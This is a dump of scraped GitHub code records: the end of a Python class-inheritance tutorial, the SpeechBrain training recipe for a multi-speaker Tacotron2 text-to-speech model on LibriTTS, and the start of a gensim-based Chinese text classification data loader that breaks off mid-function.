print(\"\")\n\n\nclass SalaryEmployee(Employee):\n def __init__(self, id, name, weekly_salary):\n super().__init__(id, name)\n self.weekly_salary = weekly_salary\n\n def calculate_payroll(self):\n return self.weekly_salary\n\n\nclass HourlyEmployee(Employee):\n def __init__(self, id, name, hours_worked, hour_rate):\n super().__init__(id, name)\n self.hours_worked = hours_worked\n self.hour_rate = hour_rate\n\n def calculate_payroll(self):\n return self.hours_worked * self.hour_rate\n\n\nclass CommissionEmployee(SalaryEmployee):\n def __init__(self, id, name, weekly_salary, commission):\n super().__init__(id, name, weekly_salary)\n self.commission = commission\n\n def calculate_payroll(self):\n fixed = super().calculate_payroll()\n return fixed + self.commission\n\n\n## Part 2\n\n\nclass Manager(SalaryEmployee):\n def work(self, hours):\n print(f\"{self.name} expends {hours} hours.\")\n\n\nclass Secretary(SalaryEmployee):\n def work(self, hours):\n print(f\"{self.name} expends {hours} hours doing office paperwork.\")\n\n\nclass SalesPerson(CommissionEmployee):\n def work(self, hours):\n print(f\"{self.name} expends {hours} hours on the phone.\")\n\n\nclass FactoryWorker(HourlyEmployee):\n def work(self, hours):\n print(f\"{self.name} manufactures gadgets for {hours} hours.\")\n\n\nclass ProductivitySystem:\n def track(self, employees, hours):\n print(\"Tracking Employee Productivity\")\n print(\"==============================\")\n for employee in employees:\n employee.work(hours)\n print(\"\")\n\n\nif __name__ == \"__main__\":\n\n salary_employee: IEmployee = SalaryEmployee(1, \"John Smith\", 1500)\n hourly_employee: IEmployee = HourlyEmployee(2, \"Jane Doe\", 40, 15)\n commission_employee: IEmployee = CommissionEmployee(3, \"Kevin Bacon\", 1000, 250)\n\n payroll_system = PayrollSystem()\n payroll_system.calculate_payroll(\n [\n salary_employee,\n hourly_employee,\n commission_employee,\n ]\n )\n\n ### Part 2\n\n manager = Manager(1, \"Mary Poppins\", 3000)\n secretary = Secretary(2, \"John Smith\", 1500)\n sales_guy = SalesPerson(3, \"Kevin Bacon\", 1000, 250)\n factory_worker = FactoryWorker(2, \"Jane Doe\", 40, 15)\n employees = [\n manager,\n secretary,\n sales_guy,\n factory_worker,\n ]\n productivity_system = ProductivitySystem()\n productivity_system.track(employees, 40)\n payroll_system = PayrollSystem()\n payroll_system.calculate_payroll(employees)\n", "repo_name": "aerosadegh/AdvancedPythonTopics", "sub_path": "topics/01-class/04.1.2-inheritance.py", "file_name": "04.1.2-inheritance.py", "file_ext": "py", "file_size_in_byte": 3362, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Protocol", "line_number": 4, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "12036904024", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n Recipe for training the Zero-Shot Multi-Speaker Tacotron Text-To-Speech model, an end-to-end\n neural text-to-speech (TTS) system\n\n To run this recipe, do the following:\n # python train.py --device=cuda:0 --max_grad_norm=1.0 --data_folder=/path_to_data_folder hparams/train.yaml\n\n Authors\n * Georges Abous-Rjeili 2021\n * Artem Ploujnikov 2021\n * Yingzhi Wang 2022\n * Pradnya Kandarkar 2023\n\"\"\"\nimport torch\nimport speechbrain as sb\nimport sys\nimport logging\nfrom hyperpyyaml import load_hyperpyyaml\nfrom speechbrain.utils.text_to_sequence import text_to_sequence\nfrom speechbrain.utils.data_utils import scalarize\nimport os\nfrom speechbrain.pretrained import HIFIGAN\nimport torchaudio\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\nlogger = logging.getLogger(__name__)\n\n\nclass Tacotron2Brain(sb.Brain):\n \"\"\"The Brain implementation for Tacotron2\"\"\"\n\n def on_fit_start(self):\n \"\"\"Gets called at the beginning of ``fit()``, on multiple processes\n if ``distributed_count > 0`` and backend is ddp and initializes statistics\"\"\"\n self.hparams.progress_sample_logger.reset()\n self.last_epoch = 0\n self.last_batch = None\n self.last_preds = None\n\n # Instantiate a vocoder if audio samples should be logged\n if self.hparams.log_audio_samples:\n self.vocoder = HIFIGAN.from_hparams(\n source=self.hparams.vocoder,\n savedir=self.hparams.vocoder_savedir,\n run_opts={\"device\": self.device},\n freeze_params=True,\n )\n\n self.last_loss_stats = {}\n return super().on_fit_start()\n\n def compute_forward(self, batch, stage):\n \"\"\"Computes the forward pass\n\n Arguments\n ---------\n batch: str\n a single batch\n stage: speechbrain.Stage\n the training stage\n\n Returns\n -------\n the model output\n \"\"\"\n effective_batch = self.batch_to_device(batch)\n inputs, y, num_items, _, _, spk_embs, spk_ids = effective_batch\n\n _, input_lengths, _, _, _ = inputs\n\n max_input_length = input_lengths.max().item()\n\n return self.modules.model(\n inputs, spk_embs, alignments_dim=max_input_length\n )\n\n def fit_batch(self, batch):\n \"\"\"Fits a single batch and applies annealing\n\n Arguments\n ---------\n batch: tuple\n a training batch\n\n Returns\n -------\n loss: torch.Tensor\n detached loss\n \"\"\"\n result = super().fit_batch(batch)\n self.hparams.lr_annealing(self.optimizer)\n return result\n\n def compute_objectives(self, predictions, batch, stage):\n \"\"\"Computes the loss given the predicted and targeted outputs\n\n Arguments\n ---------\n predictions : torch.Tensor\n The model generated mel-spectrograms and other metrics from `compute_forward`\n batch : PaddedBatch\n This batch object contains all the relevant tensors for computation\n stage : sb.Stage\n One of sb.Stage.TRAIN, sb.Stage.VALID, or sb.Stage.TEST\n\n Returns\n -------\n loss : torch.Tensor\n A one-element tensor used for backpropagating the gradient\n \"\"\"\n effective_batch = self.batch_to_device(batch)\n # Hold on to the batch for the inference sample.\n # This is needed because the infernece sample is run from on_stage_end only,\n # where batch information is not available\n self.last_batch = effective_batch\n self.last_preds = predictions\n # Hold on to a sample (for logging)\n self._remember_sample(effective_batch, predictions)\n # Compute the loss\n loss = self._compute_loss(predictions, effective_batch, stage)\n return loss\n\n def _compute_loss(self, predictions, batch, stage):\n \"\"\"Computes the value of the loss function and updates stats\n\n Arguments\n ---------\n predictions: tuple\n model predictions\n batch : PaddedBatch\n This batch object contains all the relevant tensors for computation\n stage : sb.Stage\n One of sb.Stage.TRAIN, sb.Stage.VALID, or sb.Stage.TEST\n\n Returns\n -------\n loss: torch.Tensor\n the loss value\n \"\"\"\n inputs, targets, num_items, labels, wavs, spk_embs, spk_ids = batch\n text_padded, input_lengths, _, max_len, output_lengths = inputs\n\n # Speaker embedding input to compute speaker consistency loss - WIP\n spk_emb_input = None\n\n loss_stats = self.hparams.criterion(\n predictions,\n targets,\n input_lengths,\n output_lengths,\n spk_emb_input,\n self.last_epoch,\n )\n self.last_loss_stats[stage] = scalarize(loss_stats)\n return loss_stats.loss\n\n def _remember_sample(self, batch, predictions):\n \"\"\"Remembers samples of spectrograms and the batch for logging purposes\n\n Arguments\n ---------\n batch: tuple\n a training batch\n predictions: tuple\n predictions (raw output of the Tacotron model)\n \"\"\"\n inputs, targets, num_items, labels, wavs, spk_embs, spk_ids = batch\n text_padded, input_lengths, _, max_len, output_lengths = inputs\n mel_target, _ = targets\n (\n mel_out,\n mel_out_postnet,\n gate_out,\n alignments,\n pred_mel_lengths,\n ) = predictions\n alignments_max = (\n alignments[0]\n .max(dim=-1)\n .values.max(dim=-1)\n .values.unsqueeze(-1)\n .unsqueeze(-1)\n )\n alignments_output = alignments[0].T.flip(dims=(1,)) / alignments_max\n self.hparams.progress_sample_logger.remember(\n target=self._get_spectrogram_sample(mel_target),\n output=self._get_spectrogram_sample(mel_out),\n output_postnet=self._get_spectrogram_sample(mel_out_postnet),\n alignments=alignments_output,\n raw_batch=self.hparams.progress_sample_logger.get_batch_sample(\n {\n \"text_padded\": text_padded,\n \"input_lengths\": input_lengths,\n \"mel_target\": mel_target,\n \"mel_out\": mel_out,\n \"mel_out_postnet\": mel_out_postnet,\n \"max_len\": max_len,\n \"output_lengths\": output_lengths,\n \"gate_out\": gate_out,\n \"alignments\": alignments,\n \"labels\": labels,\n \"wavs\": wavs,\n \"spk_embs\": spk_embs,\n \"spk_ids\": spk_ids,\n }\n ),\n )\n\n def batch_to_device(self, batch):\n \"\"\"Transfers the batch to the target device\n\n Arguments\n ---------\n batch: tuple\n the batch to use\n\n Returns\n -------\n batch: tuple\n the batch on the correct device\n \"\"\"\n (\n text_padded,\n input_lengths,\n mel_padded,\n gate_padded,\n output_lengths,\n len_x,\n labels,\n wavs,\n spk_embs,\n spk_ids,\n ) = batch\n text_padded = text_padded.to(self.device, non_blocking=True).long()\n input_lengths = input_lengths.to(self.device, non_blocking=True).long()\n max_len = torch.max(input_lengths.data).item()\n mel_padded = mel_padded.to(self.device, non_blocking=True).float()\n gate_padded = gate_padded.to(self.device, non_blocking=True).float()\n\n output_lengths = output_lengths.to(\n self.device, non_blocking=True\n ).long()\n x = (text_padded, input_lengths, mel_padded, max_len, output_lengths)\n y = (mel_padded, gate_padded)\n len_x = torch.sum(output_lengths)\n spk_embs = spk_embs.to(self.device, non_blocking=True).float()\n return (x, y, len_x, labels, wavs, spk_embs, spk_ids)\n\n def _get_spectrogram_sample(self, raw):\n \"\"\"Converts a raw spectrogram to one that can be saved as an image\n sample = sqrt(exp(raw))\n\n Arguments\n ---------\n raw: torch.Tensor\n the raw spectrogram (as used in the model)\n\n Returns\n -------\n sample: torch.Tensor\n the spectrogram, for image saving purposes\n \"\"\"\n sample = raw[0]\n return torch.sqrt(torch.exp(sample))\n\n def on_stage_end(self, stage, stage_loss, epoch):\n \"\"\"Gets called at the end of an epoch\n\n Arguments\n ---------\n stage : sb.Stage\n One of sb.Stage.TRAIN, sb.Stage.VALID, sb.Stage.TEST\n stage_loss : float\n The average loss for all of the data processed in this stage.\n epoch : int\n The currently-starting epoch. This is passed\n `None` during the test stage.\n \"\"\"\n\n # Logs training samples every 10 epochs\n if stage == sb.Stage.TRAIN and (\n self.hparams.epoch_counter.current % 10 == 0\n ):\n if self.last_batch is None:\n return\n\n train_sample_path = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n )\n if not os.path.exists(train_sample_path):\n os.makedirs(train_sample_path)\n\n _, targets, _, labels, wavs, spk_embs, spk_ids = self.last_batch\n\n train_sample_text = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n \"train_input_text.txt\",\n )\n with open(train_sample_text, \"w\") as f:\n f.write(labels[0])\n\n train_input_audio = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n \"train_input_audio.wav\",\n )\n torchaudio.save(\n train_input_audio,\n sb.dataio.dataio.read_audio(wavs[0]).unsqueeze(0),\n self.hparams.sample_rate,\n )\n\n _, mel_out_postnet, _, _, pred_mel_lengths = self.last_preds\n\n if self.hparams.log_audio_samples:\n waveform_ss = self.vocoder.decode_batch(mel_out_postnet[0])\n train_sample_audio = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n \"train_output_audio.wav\",\n )\n torchaudio.save(\n train_sample_audio,\n waveform_ss.squeeze(1).cpu(),\n self.hparams.sample_rate,\n )\n\n if self.hparams.use_tensorboard:\n self.tensorboard_logger.log_audio(\n f\"{stage}/train_audio_target\",\n sb.dataio.dataio.read_audio(wavs[0]).unsqueeze(0),\n self.hparams.sample_rate,\n )\n if self.hparams.log_audio_samples:\n self.tensorboard_logger.log_audio(\n f\"{stage}/train_audio_pred\",\n waveform_ss.squeeze(1),\n self.hparams.sample_rate,\n )\n try:\n self.tensorboard_logger.log_figure(\n f\"{stage}/train_mel_target\", targets[0][0]\n )\n self.tensorboard_logger.log_figure(\n f\"{stage}/train_mel_pred\", mel_out_postnet[0]\n )\n except Exception:\n # This is to avoid the code from crashing in case of a mel-spectrogram with one frame\n pass\n\n # At the end of validation, we can write\n if stage == sb.Stage.VALID:\n # Update learning rate\n lr = self.optimizer.param_groups[-1][\"lr\"]\n self.last_epoch = epoch\n\n # The train_logger writes a summary to stdout and to the logfile.\n self.hparams.train_logger.log_stats( # 1#2#\n stats_meta={\"Epoch\": epoch, \"lr\": lr},\n train_stats=self.last_loss_stats[sb.Stage.TRAIN],\n valid_stats=self.last_loss_stats[sb.Stage.VALID],\n )\n\n # The tensorboard_logger writes a summary to stdout and to the logfile.\n if self.hparams.use_tensorboard:\n self.tensorboard_logger.log_stats(\n stats_meta={\"Epoch\": epoch, \"lr\": lr},\n train_stats=self.last_loss_stats[sb.Stage.TRAIN],\n valid_stats=self.last_loss_stats[sb.Stage.VALID],\n )\n\n # Save the current checkpoint and delete previous checkpoints.\n epoch_metadata = {\n **{\"epoch\": epoch},\n **self.last_loss_stats[sb.Stage.VALID],\n }\n self.checkpointer.save_and_keep_only(\n meta=epoch_metadata,\n min_keys=[\"loss\"],\n ckpt_predicate=(\n lambda ckpt: (\n ckpt.meta[\"epoch\"]\n % self.hparams.keep_checkpoint_interval\n != 0\n )\n )\n if self.hparams.keep_checkpoint_interval is not None\n else None,\n )\n output_progress_sample = (\n self.hparams.progress_samples\n and epoch % self.hparams.progress_samples_interval == 0\n )\n if output_progress_sample:\n self.run_inference_sample(sb.Stage.VALID)\n self.hparams.progress_sample_logger.save(epoch)\n\n # We also write statistics about test data to stdout and to the logfile.\n if stage == sb.Stage.TEST:\n self.hparams.train_logger.log_stats(\n {\"Epoch loaded\": self.hparams.epoch_counter.current},\n test_stats=self.last_loss_stats[sb.Stage.TEST],\n )\n if self.hparams.use_tensorboard:\n self.tensorboard_logger.log_stats(\n {\"Epoch loaded\": self.hparams.epoch_counter.current},\n test_stats=self.last_loss_stats[sb.Stage.TEST],\n )\n if self.hparams.progress_samples:\n self.run_inference_sample(sb.Stage.TEST)\n self.hparams.progress_sample_logger.save(\"test\")\n\n def run_inference_sample(self, stage):\n \"\"\"Produces a sample in inference mode. This is called when producing\n samples and can be useful because\"\"\"\n\n if self.last_batch is None:\n return\n inputs, targets, _, labels, wavs, spk_embs, spk_ids = self.last_batch\n text_padded, input_lengths, _, _, _ = inputs\n\n mel_out, _, _ = self.hparams.model.infer(\n text_padded[:1], spk_embs[:1], input_lengths[:1]\n )\n self.hparams.progress_sample_logger.remember(\n inference_mel_out=self._get_spectrogram_sample(mel_out)\n )\n\n if stage == sb.Stage.VALID:\n inf_sample_path = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n )\n\n if not os.path.exists(inf_sample_path):\n os.makedirs(inf_sample_path)\n\n inf_sample_text = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n \"inf_input_text.txt\",\n )\n with open(inf_sample_text, \"w\") as f:\n f.write(labels[0])\n\n inf_input_audio = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n \"inf_input_audio.wav\",\n )\n torchaudio.save(\n inf_input_audio,\n sb.dataio.dataio.read_audio(wavs[0]).unsqueeze(0),\n self.hparams.sample_rate,\n )\n\n if self.hparams.log_audio_samples:\n waveform_ss = self.vocoder.decode_batch(mel_out)\n inf_sample_audio = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n \"inf_output_audio.wav\",\n )\n torchaudio.save(\n inf_sample_audio,\n waveform_ss.squeeze(1).cpu(),\n self.hparams.sample_rate,\n )\n\n if self.hparams.use_tensorboard:\n self.tensorboard_logger.log_audio(\n f\"{stage}/inf_audio_target\",\n sb.dataio.dataio.read_audio(wavs[0]).unsqueeze(0),\n self.hparams.sample_rate,\n )\n if self.hparams.log_audio_samples:\n self.tensorboard_logger.log_audio(\n f\"{stage}/inf_audio_pred\",\n waveform_ss.squeeze(1),\n self.hparams.sample_rate,\n )\n try:\n self.tensorboard_logger.log_figure(\n f\"{stage}/inf_mel_target\", targets[0][0]\n )\n self.tensorboard_logger.log_figure(\n f\"{stage}/inf_mel_pred\", mel_out\n )\n except Exception:\n # This is to avoid the code from crashing in case of a mel-spectrogram with one frame\n pass\n\n\ndef dataio_prepare(hparams):\n # Define audio pipeline:\n\n @sb.utils.data_pipeline.takes(\"wav\", \"label_phoneme\")\n @sb.utils.data_pipeline.provides(\"mel_text_pair\")\n def audio_pipeline(wav, label_phoneme):\n\n label_phoneme = \"{\" + label_phoneme + \"}\"\n\n text_seq = torch.IntTensor(\n text_to_sequence(label_phoneme, hparams[\"text_cleaners\"])\n )\n\n audio, sig_sr = torchaudio.load(wav)\n if sig_sr != hparams[\"sample_rate\"]:\n audio = torchaudio.functional.resample(\n audio, sig_sr, hparams[\"sample_rate\"]\n )\n\n mel = hparams[\"mel_spectogram\"](audio=audio.squeeze())\n\n len_text = len(text_seq)\n\n return text_seq, mel, len_text\n\n datasets = {}\n data_info = {\n \"train\": hparams[\"train_json\"],\n \"valid\": hparams[\"valid_json\"],\n \"test\": hparams[\"test_json\"],\n }\n for dataset in hparams[\"splits\"]:\n datasets[dataset] = sb.dataio.dataset.DynamicItemDataset.from_json(\n json_path=data_info[dataset],\n replacements={\"data_root\": hparams[\"data_folder\"]},\n dynamic_items=[audio_pipeline],\n output_keys=[\"mel_text_pair\", \"wav\", \"label\", \"uttid\"],\n )\n\n return datasets\n\n\nif __name__ == \"__main__\":\n\n # Load hyperparameters file with command-line overrides\n hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:])\n\n with open(hparams_file) as fin:\n hparams = load_hyperpyyaml(fin, overrides)\n\n # If --distributed_launch then\n # create ddp_group with the right communication protocol\n sb.utils.distributed.ddp_init_group(run_opts)\n\n # Create experiment directory\n sb.create_experiment_directory(\n experiment_directory=hparams[\"output_folder\"],\n hyperparams_to_save=hparams_file,\n overrides=overrides,\n )\n\n # Prepare data\n if not hparams[\"skip_prep\"]:\n sys.path.append(\"../../\")\n from libritts_prepare import prepare_libritts\n\n sb.utils.distributed.run_on_main(\n prepare_libritts,\n kwargs={\n \"data_folder\": hparams[\"data_folder\"],\n \"save_json_train\": hparams[\"train_json\"],\n \"save_json_valid\": hparams[\"valid_json\"],\n \"save_json_test\": hparams[\"test_json\"],\n \"sample_rate\": hparams[\"sample_rate\"],\n \"train_split\": hparams[\"train_split\"],\n \"valid_split\": hparams[\"valid_split\"],\n \"test_split\": hparams[\"test_split\"],\n \"seed\": hparams[\"seed\"],\n \"model_name\": hparams[\"model\"].__class__.__name__,\n },\n )\n\n from compute_speaker_embeddings import compute_speaker_embeddings\n\n sb.utils.distributed.run_on_main(\n compute_speaker_embeddings,\n kwargs={\n \"input_filepaths\": [\n hparams[\"train_json\"],\n hparams[\"valid_json\"],\n hparams[\"test_json\"],\n ],\n \"output_file_paths\": [\n hparams[\"train_speaker_embeddings_pickle\"],\n hparams[\"valid_speaker_embeddings_pickle\"],\n hparams[\"test_speaker_embeddings_pickle\"],\n ],\n \"data_folder\": hparams[\"data_folder\"],\n \"spk_emb_encoder_path\": hparams[\"spk_emb_encoder\"],\n \"spk_emb_sr\": hparams[\"spk_emb_sample_rate\"],\n \"mel_spec_params\": {\n \"custom_mel_spec_encoder\": hparams[\"custom_mel_spec_encoder\"],\n \"sample_rate\": hparams[\"spk_emb_sample_rate\"],\n \"hop_length\": hparams[\"hop_length\"],\n \"win_length\": hparams[\"win_length\"],\n \"n_mel_channels\": hparams[\"n_mel_channels\"],\n \"n_fft\": hparams[\"n_fft\"],\n \"mel_fmin\": hparams[\"mel_fmin\"],\n \"mel_fmax\": hparams[\"mel_fmax\"],\n \"mel_normalized\": hparams[\"mel_normalized\"],\n \"power\": hparams[\"power\"],\n \"norm\": hparams[\"norm\"],\n \"mel_scale\": hparams[\"mel_scale\"],\n \"dynamic_range_compression\": hparams[\n \"dynamic_range_compression\"\n ],\n },\n \"device\": run_opts[\"device\"],\n },\n )\n\n datasets = dataio_prepare(hparams)\n\n # Brain class initialization\n tacotron2_brain = Tacotron2Brain(\n modules=hparams[\"modules\"],\n opt_class=hparams[\"opt_class\"],\n hparams=hparams,\n run_opts=run_opts,\n checkpointer=hparams[\"checkpointer\"],\n )\n\n # Load pretrained model if pretrained_separator is present in the yaml\n if \"pretrained_separator\" in hparams:\n sb.utils.distributed.run_on_main(\n hparams[\"pretrained_separator\"].collect_files\n )\n hparams[\"pretrained_separator\"].load_collected(\n device=run_opts[\"device\"]\n )\n\n if hparams[\"use_tensorboard\"]:\n tacotron2_brain.tensorboard_logger = sb.utils.train_logger.TensorboardLogger(\n save_dir=hparams[\"output_folder\"] + \"/tensorboard\"\n )\n\n # Training\n tacotron2_brain.fit(\n tacotron2_brain.hparams.epoch_counter,\n train_set=datasets[\"train\"],\n valid_set=datasets[\"valid\"],\n train_loader_kwargs=hparams[\"train_dataloader_opts\"],\n valid_loader_kwargs=hparams[\"valid_dataloader_opts\"],\n )\n\n # Test\n if \"test\" in datasets:\n tacotron2_brain.evaluate(\n datasets[\"test\"],\n test_loader_kwargs=hparams[\"test_dataloader_opts\"],\n )\n", "repo_name": "speechbrain/speechbrain", "sub_path": "recipes/LibriTTS/TTS/mstacotron2/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 23407, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6855, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "speechbrain.Brain", "line_number": 30, "usage_type": "attribute"}, {"api_name": "speechbrain.pretrained.HIFIGAN.from_hparams", "line_number": 43, "usage_type": "call"}, {"api_name": "speechbrain.pretrained.HIFIGAN", "line_number": 43, "usage_type": "name"}, {"api_name": "speechbrain.utils.data_utils.scalarize", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 237, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 265, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 265, "usage_type": "call"}, {"api_name": "speechbrain.Stage", "line_number": 282, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 288, "usage_type": "call"}, {"api_name": "os.path", "line_number": 288, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 292, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 293, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 297, "usage_type": "call"}, {"api_name": "os.path", "line_number": 297, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 305, "usage_type": "call"}, {"api_name": "os.path", "line_number": 305, "usage_type": "attribute"}, {"api_name": "torchaudio.save", "line_number": 310, "usage_type": "call"}, {"api_name": "speechbrain.dataio.dataio.read_audio", "line_number": 312, "usage_type": "call"}, {"api_name": "speechbrain.dataio", "line_number": 312, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 320, "usage_type": "call"}, {"api_name": "os.path", "line_number": 320, "usage_type": "attribute"}, {"api_name": "torchaudio.save", "line_number": 325, "usage_type": "call"}, {"api_name": "speechbrain.dataio.dataio.read_audio", "line_number": 334, "usage_type": "call"}, {"api_name": "speechbrain.dataio", "line_number": 334, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 355, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 363, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 364, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 371, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 372, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 378, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 398, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 402, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 405, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 410, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 413, "usage_type": "attribute"}, {"api_name": "speechbrain.Stage", "line_number": 432, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 433, "usage_type": "call"}, {"api_name": "os.path", "line_number": 433, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path", "line_number": 438, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 439, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 441, "usage_type": "call"}, {"api_name": "os.path", "line_number": 441, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 449, "usage_type": "call"}, {"api_name": "os.path", "line_number": 449, "usage_type": "attribute"}, {"api_name": "torchaudio.save", "line_number": 454, "usage_type": "call"}, {"api_name": "speechbrain.dataio.dataio.read_audio", "line_number": 456, "usage_type": "call"}, {"api_name": "speechbrain.dataio", "line_number": 456, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 462, "usage_type": "call"}, {"api_name": "os.path", "line_number": 462, "usage_type": "attribute"}, {"api_name": "torchaudio.save", "line_number": 467, "usage_type": "call"}, {"api_name": "speechbrain.dataio.dataio.read_audio", "line_number": 476, "usage_type": "call"}, {"api_name": "speechbrain.dataio", "line_number": 476, "usage_type": "attribute"}, {"api_name": "torch.IntTensor", "line_number": 506, "usage_type": "call"}, {"api_name": "speechbrain.utils.text_to_sequence.text_to_sequence", "line_number": 507, "usage_type": "call"}, {"api_name": "torchaudio.load", "line_number": 510, "usage_type": "call"}, {"api_name": "torchaudio.functional.resample", "line_number": 512, "usage_type": "call"}, {"api_name": "torchaudio.functional", "line_number": 512, "usage_type": "attribute"}, {"api_name": "speechbrain.utils.data_pipeline.takes", "line_number": 500, "usage_type": "call"}, {"api_name": "speechbrain.utils", "line_number": 500, "usage_type": "attribute"}, {"api_name": "speechbrain.utils.data_pipeline.provides", "line_number": 501, "usage_type": "call"}, {"api_name": "speechbrain.utils", "line_number": 501, "usage_type": "attribute"}, {"api_name": "speechbrain.dataio.dataset.DynamicItemDataset.from_json", "line_number": 529, "usage_type": "call"}, {"api_name": "speechbrain.dataio", "line_number": 529, "usage_type": "attribute"}, {"api_name": "speechbrain.parse_arguments", "line_number": 542, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 542, "usage_type": "attribute"}, {"api_name": "hyperpyyaml.load_hyperpyyaml", "line_number": 545, "usage_type": "call"}, {"api_name": "speechbrain.utils.distributed.ddp_init_group", "line_number": 549, "usage_type": "call"}, {"api_name": "speechbrain.utils", "line_number": 549, "usage_type": "attribute"}, {"api_name": "speechbrain.create_experiment_directory", "line_number": 552, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 560, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 560, "usage_type": "attribute"}, {"api_name": "speechbrain.utils.distributed.run_on_main", "line_number": 563, "usage_type": "call"}, {"api_name": "libritts_prepare.prepare_libritts", "line_number": 564, "usage_type": "argument"}, {"api_name": "speechbrain.utils", "line_number": 563, "usage_type": "attribute"}, {"api_name": "speechbrain.utils.distributed.run_on_main", "line_number": 581, "usage_type": "call"}, {"api_name": "compute_speaker_embeddings.compute_speaker_embeddings", "line_number": 582, "usage_type": "argument"}, {"api_name": "speechbrain.utils", "line_number": 581, "usage_type": "attribute"}, {"api_name": "speechbrain.utils.distributed.run_on_main", "line_number": 631, "usage_type": "call"}, {"api_name": "speechbrain.utils", "line_number": 631, "usage_type": "attribute"}, {"api_name": "speechbrain.utils.train_logger.TensorboardLogger", "line_number": 639, "usage_type": "call"}, {"api_name": "speechbrain.utils", "line_number": 639, "usage_type": "attribute"}]} +{"seq_id": "43526719215", "text": "# -*- coding: utf-8 -*-\n\n__author__ = 'PC-LiNing'\n\nimport codecs\nfrom gensim import corpora\nfrom scipy import sparse\nimport numpy as np\nfrom collections import defaultdict\n\nstoplist = set('的 和 与 中 为 及 对 在 了 例'.split())\n\n\ndef load_texts(file):\n f = codecs.open(file,encoding='utf-8')\n texts = []\n for line in f.readlines():\n line = line.strip('\\n').strip()\n words = line.split()\n # remove stop word and single word\n texts.append([word for word in words if word not in stoplist and len(word) > 1])\n return texts\n\n\ndef load_corpus():\n texts_1 = load_texts('F:/PycharmProjects/TagPaper/lda/dataset/建筑.txt')\n # texts_2 = load_texts('F:/PycharmProjects/TagPaper/lda/心理kw.txt')\n texts_3 = load_texts('F:/PycharmProjects/TagPaper/lda/dataset/机械.txt')\n texts_4 = load_texts('F:/PycharmProjects/TagPaper/lda/dataset/计算机.txt')\n tag_list = [0]*len(texts_1) + [1]*len(texts_3) + [2]*len(texts_4)\n print(\"建筑:\"+str(len(texts_1)))\n print(\"机械:\"+str(len(texts_3)))\n print(\"计算机:\"+str(len(texts_4)))\n texts = texts_1 + texts_3 + texts_4\n \"\"\"\n # remove words that appear only once\n frequency = defaultdict(int)\n for text in texts:\n for token in text:\n frequency[token] += 1\n texts = [[token for token in text if frequency[token] > 1] for text in texts]\n \"\"\"\n dictionary = corpora.Dictionary(texts)\n corpus = [dictionary.doc2bow(text) for text in texts]\n return corpus,dictionary,np.asarray(tag_list)\n\n\ndef get_max_length(corpus):\n max_length = 0\n for line in corpus:\n if len(line) > max_length:\n max_length = len(line)\n return max_length\n\n\ndef convert_to_matrix(corpus):\n max_length = get_max_length(corpus)\n print('max length : '+str(max_length))\n matrix = np.zeros(shape=(len(corpus),max_length),dtype=np.int32)\n count = 0\n for line in corpus:\n row = np.asarray([pair[0] for pair in line]+[-1]*(max_length-len(line)),dtype=np.int32)\n matrix[count] = row\n count += 1\n return matrix\n\n\ndef get_train_test(matrix,tag_list):\n line_count = len(tag_list)\n shuffle_indices = np.random.permutation(np.arange(line_count))\n label_shuffled = tag_list[shuffle_indices]\n matrix_shuffled = matrix[shuffle_indices]\n Test_Size = line_count * 0.2\n x_train = matrix_shuffled[Test_Size:]\n y_train = label_shuffled[Test_Size:]\n x_test=matrix_shuffled[:Test_Size]\n 